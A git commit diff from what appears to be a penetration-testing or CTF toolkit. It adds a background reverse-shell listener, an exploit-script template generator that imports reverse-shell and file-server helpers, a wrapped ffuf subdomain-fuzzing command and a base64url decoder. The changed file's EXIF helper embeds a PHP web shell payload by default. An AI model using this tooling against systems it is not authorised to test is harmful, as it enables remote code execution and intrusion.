new functions

This commit is contained in:
Roman Hergenreder 2023-10-01 11:23:05 +02:00
parent b3cd20ca8b
commit b4a96e1398
5 changed files with 85 additions and 27 deletions

@ -300,6 +300,13 @@ def generate_payload(type, local_address, port, index=None):
def spawn_listener(port): def spawn_listener(port):
pty.spawn(["nc", "-lvvp", str(port)]) pty.spawn(["nc", "-lvvp", str(port)])
def spawn_background_shell(port):
listener = ShellListener("0.0.0.0", port)
listener.startBackground()
while listener.connection is None:
time.sleep(0.5)
return listener
def trigger_shell(func, port): def trigger_shell(func, port):
def _wait_and_exec(): def _wait_and_exec():
time.sleep(1.5) time.sleep(1.5)

@ -66,11 +66,9 @@ class SSHServer:
paramiko_connection = ParamikoConnection(self) paramiko_connection = ParamikoConnection(self)
transport.start_server(server=paramiko_connection) transport.start_server(server=paramiko_connection)
self.transports.append(transport) self.transports.append(transport)
# for client_sock in self.client_sockets:
except BlockingIOError: except BlockingIOError:
pass pass
# handle_client(client_socket, client_address)
finally: finally:
self.listen_socket.close() self.listen_socket.close()
@ -81,7 +79,7 @@ class SSHServer:
def close(self): def close(self):
if self.listen_socket: if self.listen_socket:
self.listen_socket.close() self.listen_socket.shutdown(socket.SHUT_RDWR)
for sock in self.client_sockets: for sock in self.client_sockets:
sock.close() sock.close()

@ -32,6 +32,6 @@ charcountNonExistent=$(curl -s "${PROTOCOL}://$(uuidgen).${DOMAIN}" -k -m 5 | wc
echo "[+] Chars: ${charcountDomain}, ${charcountIpAddress}, ${charcountNonExistent}" echo "[+] Chars: ${charcountDomain}, ${charcountIpAddress}, ${charcountNonExistent}"
echo "[ ] Fuzzing…" echo "[ ] Fuzzing…"
ffuf --fs ${charcountDomain},${charcountIpAddress},${charcountNonExistent} --fc 400 --mc all \ (set -x; ffuf --fs ${charcountDomain},${charcountIpAddress},${charcountNonExistent} --fc 400 --mc all \
-w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt \ -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt \
-u "${PROTOCOL}://${IP_ADDRESS}" -H "Host: FUZZ.${DOMAIN}" "${@:2}" -u "${PROTOCOL}://${IP_ADDRESS}" -H "Host: FUZZ.${DOMAIN}" "${@:2}")

@ -2,26 +2,21 @@
import sys import sys
def generateTemplate(baseUrl): def generate_template(base_url, features):
template = """#!/usr/bin/env python
import os if "proxy" in features or "burp" in features:
import sys proxy = """
import json if \"proxy\" not in kwargs:
import time kwargs[\"proxy\"] = {\"http\":\"http://127.0.0.1:8080\", \"https\":\"http://127.0.0.1:8080\"}
import base64 """
import requests else:
import subprocess proxy = ""
import urllib.parse
from bs4 import BeautifulSoup
from hackingscripts import util, fileserver, rev_shell
from urllib3.exceptions import InsecureRequestWarning variables = {
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) "BASE_URL": f'"{base_url}" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"'
}
BASE_URL = "%s" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337" request_method = f"""def request(method, uri, **kwargs):
def request(method, uri, **kwargs):
if not uri.startswith("/") and uri != "": if not uri.startswith("/") and uri != "":
uri = "/" + uri uri = "/" + uri
@ -35,24 +30,78 @@ def request(method, uri, **kwargs):
if "verify" not in kwargs: if "verify" not in kwargs:
kwargs["verify"] = False kwargs["verify"] = False
{proxy}
return client.request(method, BASE_URL + uri, **kwargs) return client.request(method, BASE_URL + uri, **kwargs)
"""
methods = [request_method]
if "login" in features or "account" in features:
variables["USERNAME"] = '"Blindhero"'
variables["PASSWORD"] = '"test1234"'
methods.append("""
def login(username, password):
session = requests.Session()
res = request("POST", "/login", data={"username": username, "password": password}, session=session)
if res.status_code != 200:
print("[-] Error logging in")
exit()
return session
""")
if "register" in features or "account" in features:
variables["USERNAME"] = '"Blindhero"'
variables["PASSWORD"] = '"test1234"'
methods.append("""
def register(username, password):
res = request("POST", "/register", data={"username": username, "password": password})
if res.status_code != 200:
print("[-] Error registering")
exit()
return True
""")
main = """
if __name__ == "__main__": if __name__ == "__main__":
pass pass
""" % baseUrl """
return template variables = "\n".join(f"{k} = {v}" for k, v in variables.items())
header = f"""#!/usr/bin/env python
import os
import re
import sys
import json
import time
import base64
import requests
import subprocess
import urllib.parse
from bs4 import BeautifulSoup
from hackingscripts import util, fileserver, rev_shell
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
{variables}
"""
return header + "".join(methods) + main
if __name__ == "__main__": if __name__ == "__main__":
if len(sys.argv) < 2: if len(sys.argv) < 2:
print("Usage: %s <URL>" % sys.argv[0]) print("Usage: %s <URL> [features]" % sys.argv[0])
exit() exit()
url = sys.argv[1] url = sys.argv[1]
if "://" not in url: if "://" not in url:
url = "http://" + url url = "http://" + url
template = generateTemplate(url) features = [] if len(sys.argv) < 3 else sys.argv[2].split(",")
template = generate_template(url, features)
print(template) print(template)

@ -3,6 +3,7 @@
import random import random
import math import math
import socket import socket
import base64
import itertools import itertools
import netifaces as ni import netifaces as ni
import string import string
@ -209,6 +210,9 @@ def xor(a, b):
return b"".join([bytes([c1 ^ c2]) for (c1,c2) in zip(a, b) ]) return b"".join([bytes([c1 ^ c2]) for (c1,c2) in zip(a, b) ])
def base64urldecode(data):
return base64.urlsafe_b64decode(data + b'=' * (4 - len(data) % 4))
def set_exif_data(payload="<?php system($_GET['c']);?>", _in=None, _out=None, exif_tag=None): def set_exif_data(payload="<?php system($_GET['c']);?>", _in=None, _out=None, exif_tag=None):
import exif import exif